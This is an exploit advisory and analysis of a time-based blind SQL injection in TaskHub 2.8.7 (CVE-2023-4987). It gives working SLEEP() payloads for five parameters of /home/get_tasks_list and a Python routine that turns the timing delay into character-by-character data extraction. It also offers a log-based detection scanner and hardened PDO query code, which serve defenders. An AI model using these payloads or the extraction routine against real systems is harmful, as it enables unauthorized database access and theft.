taskhub 2.8.7 - SQL Injection

Exploit Author: CraCkEr
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2024-02-26
# Exploit Title: taskhub 2.8.7 - SQL Injection
# Exploit Author: CraCkEr
# Date: 05/09/2023
# Vendor: Infinitie Technologies
# Vendor Homepage: https://www.infinitietech.com/
# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Demo: https://taskhub.company/auth
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4987
# CWE: CWE-89 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data, and crashing of the application or making it unavailable, leading to lost revenue
and damage to a company's reputation.


Path: /home/get_tasks_list

GET parameter 'project' is vulnerable to SQL Injection
GET parameter 'status' is vulnerable to SQL Injection
GET parameter 'user_id' is vulnerable to SQL Injection
GET parameter 'sort' is vulnerable to SQL Injection
GET parameter 'search' is vulnerable to SQL Injection


https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]


---
Parameter: project (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: status (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: user_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

Parameter: sort (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=

Parameter: search (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW
---


[-] Done


TaskHub 2.8.7 SQL Injection Vulnerability: A Deep Dive into CVE-2023-4987

Security vulnerabilities in web applications continue to pose significant risks to organizations worldwide. One such flaw in TaskHub 2.8.7, a project management, finance and CRM tool developed by Infinitie Technologies, shows what happens when request parameters are concatenated into SQL statements. The vulnerability, tracked as CVE-2023-4987 and classified under CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, 'SQL Injection'), lets an attacker inject SQL through several GET parameters of a single endpoint.

Exploit Overview

The vulnerability exists in the /home/get_tasks_list endpoint, which returns task data according to the filter, sort and paging parameters shown in the advisory above. Five of those parameters (project, status, user_id, sort and search) are injectable. The advisory is by CraCkEr and is dated 05/09/2023 in its header.

The payloads the advisory records are time-based blind: the endpoint does not return query results or database errors in a form the attacker can read, so the only observable signal is the delay that SLEEP() introduces. "Blind" describes the attacker's view, not the defender's: the payloads still travel in the query string and are visible in access logs and to a WAF, and the stalled requests show up as response times of several seconds on an otherwise fast endpoint.

Attack Vector: Time-Based Blind SQL Injection

Time-based blind SQL injection is a technique where the attacker injects an expression that makes the database pause, typically SLEEP(n) on MySQL, where n is the number of seconds to delay. If the response takes roughly n seconds longer than a baseline request with a harmless value, the injected expression was evaluated by the database. A single slow response proves little on its own; the check is normally repeated with different n (the advisory uses 6, 7 and 8) so that network jitter cannot be mistaken for a hit.

project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=

This payload targets the project parameter, which the server evidently places inside a quoted string literal. The leading quote closes that literal, and the trailing 'Z lets the application's own closing quote pair up again, so the statement stays syntactically valid: the comparison becomes something like project = '' XOR (SELECT(0)FROM(SELECT(SLEEP(8)))a) XOR 'Z'. XOR is just a boolean operator that joins the three operands; what matters is that evaluating the derived table (SELECT(SLEEP(8)))a makes MySQL pause for about 8 seconds, which the attacker observes as the response time.

Parameter-Specific Exploitation

Each of the five vulnerable parameters can be exploited independently, allowing attackers to probe the database structure and extract sensitive information. Below is a breakdown of how each parameter can be targeted:

Parameter  Injection type    Example payload                                           What the payload shows
---------  ----------------  --------------------------------------------------------  -------------------------------------------------------------
project    Time-based blind  project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z       Quoted string context; the leading quote breaks out of it
status     Time-based blind  status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z        Same quoted string context as project
user_id    Time-based blind  user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)                Unquoted numeric context; no quote is needed at all
sort       Time-based blind  sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)                   Unquoted, consistent with an ORDER BY clause
search     Time-based blind  search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW   String inside parentheses; the comment discards the rest

Two details are worth noting. The user_id and sort payloads contain no quote, so these values are inserted into the statement bare; escaping quotes would not have stopped them, and sort in particular lands where a column name is expected, a position that prepared-statement parameters cannot protect. Every row in the table is only a delay-based confirmation; extracting data requires wrapping SLEEP() in a condition so that the delay answers a yes/no question about the database.

For the search parameter, the payload starts with ') to close both the string literal and an enclosing parenthesis, which suggests the search term sits inside a parenthesized expression such as a LIKE clause (the advisory does not show the query itself). AND (SELECT(0)FROM(SELECT(SLEEP(7)))a) then attaches the delay to the existing condition, and -- wXyW comments out whatever the application appends afterwards; MySQL requires whitespace after --, and the random token is the kind of filler sqlmap adds so the comment is well formed.
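The following is an added example, not part of the advisory and not TaskHub code. It shows how a SLEEP()-based probe like the user_id payload above is turned into data extraction: the delay is made conditional on one character of a secret, and a binary search over the ASCII range recovers each character in seven requests. The MySQL backend is simulated by a constructed function that adds the delay when the condition holds; the payload construction and the timing decision are what a real attacker would run, and the subquery text, secret value and baseline timings are all constructed.

```python
"""Added example: turning a time-based blind injection into a character
extraction oracle. Everything about the target (secret, timings) is simulated."""
from statistics import median

DELAY = 3  # seconds the payload asks MySQL to sleep when the condition is true


def build_payload(subquery: str, pos: int, threshold: int, delay: int = DELAY) -> str:
    """MySQL payload for an unquoted numeric context such as user_id= above.
    Evaluates to SLEEP(delay) when ASCII(char pos of subquery result) > threshold,
    otherwise to 0. `subquery` (an assumption) must return a single string."""
    return (f"(SELECT IF(ASCII(SUBSTRING(({subquery}),{pos},1))>{threshold},"
            f"SLEEP({delay}),0))")


def is_delayed(elapsed: float, baseline: list, delay: int = DELAY) -> bool:
    """Timing decision: a hit must exceed the baseline median by most of the
    requested delay. Jitter of a few hundred ms cannot reach 80% of 3 s."""
    return elapsed - median(baseline) >= 0.8 * delay


def extract_string(oracle, length: int):
    """Binary-search each character through oracle(pos, threshold), which is
    True when the character at pos is > threshold. Returns (value, queries)."""
    out, queries = [], 0
    for pos in range(1, length + 1):
        lo, hi = 0, 127  # ASCII range: 7 queries per character, not up to 127
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if oracle(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out), queries


# --- constructed simulation of a vulnerable MySQL backend --------------------
SECRET = "admin"                              # stands in for the subquery result
BASELINE = [0.21, 0.19, 0.23, 0.20, 0.22]     # constructed normal response times


def simulated_request(pos: int, threshold: int) -> float:
    """Fake elapsed time: normal latency plus DELAY when the injected condition
    is true, which is exactly what SLEEP() does on a real target."""
    condition = pos <= len(SECRET) and ord(SECRET[pos - 1]) > threshold
    return 0.25 + (DELAY if condition else 0.0)


def timing_oracle(pos: int, threshold: int) -> bool:
    return is_delayed(simulated_request(pos, threshold), BASELINE)


if __name__ == "__main__":
    print(build_payload("SELECT username FROM users LIMIT 1", 1, 64))
    value, n = extract_string(timing_oracle, len(SECRET))
    print(value, n)
```

In a real engagement the oracle would issue the request with the payload substituted for user_id and measure the round trip; the 80% margin in is_delayed is why the probe delays are chosen well above normal response times.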

Real-World Impact and Risk Assessment

SQL injection vulnerabilities in a project management tool like TaskHub can lead to severe consequences:

  • Database Access: Attackers can extract user credentials, task details, financial records, and internal communications.
  • Data Modification: Unauthorized changes to task statuses, user roles, or project timelines can disrupt workflows.
  • Denial of Service: injected SLEEP() calls or heavy subqueries hold database connections and can make the endpoint, or the application, unavailable.
  • Reputation Damage: Breaches involving sensitive business data can lead to legal liabilities and loss of client trust.

Given that TaskHub is marketed as a CRM, finance, and project management tool, it likely stores confidential data across multiple domains — making this vulnerability particularly dangerous for small and medium-sized enterprises (SMEs).

Expert Recommendations for Mitigation

Organizations using TaskHub or similar software must take immediate action to address this vulnerability:

  • Use Prepared Statements: replace string-built SQL with prepared statements and bind every value (project, status, user_id, search, limit, offset) as a parameter; this is the fix, the rest of the list is supporting controls.
  • Whitelist Identifiers: the sort column and order direction cannot be bound as parameters, so validate them against a fixed list of allowed column names and ASC/DESC before they reach the statement text.
  • Input Validation: cast numeric parameters such as user_id, limit and offset to integers and reject values that do not fit their expected type or range.
  • Apply Web Application Firewalls (WAF): a WAF can block obvious payloads such as the SLEEP() probes above, but it is a compensating control that can be bypassed and does not remove the flaw.
  • Regular Penetration Testing: conduct routine security audits to identify and remediate vulnerabilities early.
  • Update Software: upgrade to the latest version of TaskHub, or apply vendor-provided patches if available.
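As an added example (not from the advisory or TaskHub), here is the detection side of the WAF and monitoring items above: a small scanner that reads web-server access logs, URL-decodes each query parameter, flags the timing primitives used by the payloads on this page (and the MSSQL/PostgreSQL equivalents), and correlates them with the server-side request time. The log lines are constructed, the format is assumed to be Apache combined with request time in microseconds (%D) appended, and the sqlmap user agent is a constructed detail, not something the advisory records.

```python
"""Added example: flag time-based SQLi probes in constructed access-log lines."""
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache combined log format with %D (request time in microseconds) appended.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<us>\d+)$')

# Timing primitives: MySQL SLEEP/BENCHMARK, PostgreSQL pg_sleep, MSSQL WAITFOR DELAY.
SLEEP_RE = re.compile(
    r'\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b', re.IGNORECASE)
SLOW_US = 2_000_000  # 2 s: assumed to be far above a normal get_tasks_list response


def scan_line(line: str) -> Optional[dict]:
    """Return a finding when a decoded query parameter carries a timing
    primitive; 'delayed' records whether the server actually stalled."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decoding again catches double-encoded payloads
        if SLEEP_RE.search(unquote_plus(value)):
            hits.append(name)
    if not hits:
        return None
    return {"ip": m["ip"], "path": parts.path, "params": hits,
            "delayed": int(m["us"]) >= SLOW_US}


def scan(lines):
    return [f for f in (scan_line(line) for line in lines) if f]


# Constructed sample: two probes mirroring the advisory payloads, one benign request.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Sep/2023:14:02:11 +0000] "GET /home/get_tasks_list?project='
    '%27XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR%27Z&status=&workspace_id=1&user_id=23'
    '&limit=10&sort=id&order=desc&offset=0&search= HTTP/1.1" 200 412 "-" "sqlmap/1.7" 8213440',
    '203.0.113.7 - - [05/Sep/2023:14:02:21 +0000] "GET /home/get_tasks_list?project=&status='
    '&workspace_id=1&user_id=23&limit=10&sort=id&order=desc&offset=0&search=%27)%20AND%20'
    '(SELECT(0)FROM(SELECT(SLEEP(7)))a)--%20wXyW HTTP/1.1" 200 412 "-" "sqlmap/1.7" 7102981',
    '198.51.100.4 - - [05/Sep/2023:14:02:30 +0000] "GET /home/get_tasks_list?project=12'
    '&status=open&workspace_id=1&user_id=23&limit=10&sort=id&order=desc&offset=0'
    '&search=invoice HTTP/1.1" 200 2048 "-" "Mozilla/5.0" 184233',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A keyword match alone is a probe; a keyword match on a request that also took several seconds is a probe that worked, which is the alert worth paging on.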

Improved Secure Code Example

Here is an illustrative hardened version of the query logic using PDO prepared statements. The table and column names are assumed; this is not TaskHub's code:


// Hardened approach using PDO: bind every value, and whitelist anything that
// must become an identifier or keyword, because ORDER BY columns and ASC/DESC
// cannot be bound as parameters.
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // server-side prepares

// sort and order end up in the statement text, so they are allow-listed.
$allowedSort  = ['id', 'title', 'status', 'due_date']; // assumed column names
$allowedOrder = ['asc', 'desc'];
$sort  = in_array($sort, $allowedSort, true) ? $sort : 'id';
$order = in_array(strtolower($order), $allowedOrder, true) ? strtolower($order) : 'desc';

// LIMIT/OFFSET take integers only; GET values arrive as strings, so cast them.
$limit  = max(1, min((int) $limit, 100));
$offset = max(0, (int) $offset);

// Escape LIKE wildcards so '%' and '_' typed by the user match literally.
$pattern = '%' . addcslashes($search, '%_\\') . '%';

$stmt = $pdo->prepare("
    SELECT * FROM tasks
    WHERE project = :project
      AND status = :status
      AND user_id = :user_id
      AND title LIKE :search
    ORDER BY $sort $order
    LIMIT :limit OFFSET :offset
");

$stmt->bindValue(':project', $project, PDO::PARAM_STR);
$stmt->bindValue(':status', $status, PDO::PARAM_STR);
$stmt->bindValue(':user_id', (int) $user_id, PDO::PARAM_INT);
$stmt->bindValue(':search', $pattern, PDO::PARAM_STR);
$stmt->bindValue(':limit', $limit, PDO::PARAM_INT);
$stmt->bindValue(':offset', $offset, PDO::PARAM_INT);

$stmt->execute();
$tasks = $stmt->fetchAll(PDO::FETCH_ASSOC);

Binding separates data from code: the statement is prepared with placeholders and the values are sent separately, so a quote or keyword in project or search is never parsed as SQL. Two things cannot be handled by binding and are the reason for the extra code. The ORDER BY column and direction are an identifier and a keyword, not values; writing ORDER BY :sort :order would bind a string and sort by a constant (or fail) instead of by the requested column, so both are checked against an allow-list before being interpolated. LIMIT and OFFSET must be integers; GET parameters arrive as strings, and with emulated prepares PDO can quote them as strings, which MySQL rejects, so they are cast first.

Conclusion

The TaskHub 2.8.7 SQL Injection vulnerability serves as a stark reminder that even seemingly benign web applications can harbor critical security flaws. Developers and administrators must prioritize secure coding practices, input validation, and proactive monitoring. By adopting modern security standards such as parameterized queries and WAFs, organizations can significantly reduce the risk of data breaches and operational disruptions.

For users of TaskHub, immediate action is advised: upgrade to a version in which the vendor has fixed the issue and, until that is possible, restrict access to the application and monitor requests to /home/get_tasks_list for payloads like those above. CVE-2023-4987 remains a high-risk issue until remediated.